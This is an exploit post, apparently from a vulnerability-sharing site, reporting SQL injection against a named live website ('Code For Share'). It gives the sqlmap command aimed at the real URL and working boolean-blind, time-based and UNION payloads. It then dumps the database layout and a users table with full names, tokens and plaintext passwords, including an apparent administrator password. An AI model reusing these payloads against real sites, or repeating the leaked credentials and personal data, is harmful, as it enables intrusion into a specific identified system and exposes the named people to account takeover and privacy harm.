Code For Share | SQL Injection Vulnerability

# Exploit Title: Code For Share | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://c4s.khacdatdo.dev/edit.php?id=33" --dbs --batch
---------------------------------------------------------------------------------------------------

.dev Developer / Software

Code For Share

https://c4s.khacdatdo.dev/edit.php?id=33

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=136 AND 3415=3415

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=136 AND (SELECT 2301 FROM (SELECT(SLEEP(5)))MWrG)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=136 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x514a7842596c6b48737771584e474d756864455053446a54765843454d6b6b6441654351776e6965,0x717a6b6a71),NULL,NULL-- -
---

database management system users [1]:
[+] 'i4b3whw47kx5zgbc'@'%'

the back-end DBMS is MySQL
web application technology: PHP, Apache
back-end DBMS: MySQL >= 5.0.12

available databases [2]:
[+] an1g279qniutsqwr
[+] information_schema

Database: an1g279qniutsqwr
[8 tables]
+---------------+
| discord-bot   |
| chatbot       |
| thcs2_code    |
| thcs2_log     |
| thcs2_report  |
| thcs2_txtcode |
| thcs2_users   |
| thcs2_view    |
+---------------+

Database: an1g279qniutsqwr
Table: thcs2_users
[8 entries]
+----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+
| id                                                             | email | token      | birthday         | fullname       | password    | typeuser | username |
+----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+
| uFzEQ5U90fN30mODLIDeu3vF2IGnd933d6d084280054df6349e05ac15e2a3c | 1     | admin      | Đỗ Khắc Đạt      | Datdongket@123 | admin       | <blank>  | <blank>  |
| member                                                         | 2     | <blank>    | Vũ Đình Công     | congvu         | congvu      | <blank>  | <blank>  |
| member                                                         | 3     | <blank>    | Phạm Anh Hiếu    | hieupham       | hieupham    | <blank>  | <blank>  |
| L67MNsJ22s2t3Deu0vXnU1NnwZgOdCaa661568aac0790dcab888d9cba85ad4 | 4     | diepnguyen | Nguyễn Thế Điệp  | diepnguyen     | member      | <blank>  | <blank>  |
| 8L50OlZJjjWA2gzQlwsCnJmhgGnHmk8691fd3a1e02d55dd75dc1d4a0a44b32 | 5     | haunguyen  | Nguyễn Văn Hậu   | haunguyen      | member      | <blank>  | <blank>  |
| member                                                         | 6     | <blank>    | Tô Tiến Dũng     | dungto         | dungto      | <blank>  | <blank>  |
| member                                                         | 7     | <blank>    | Nguyễn Huy Hoàng | hoangnguyen    | hoangnguyen | <blank>  | <blank>  |
| member                                                         | 8     | <blank>    | Bùi Quang Huy    | huybui         | huybui      | <blank>  | <blank>  |
+----------------------------------------------------------------+-------+------------+------------------+----------------+-------------+----------+----------+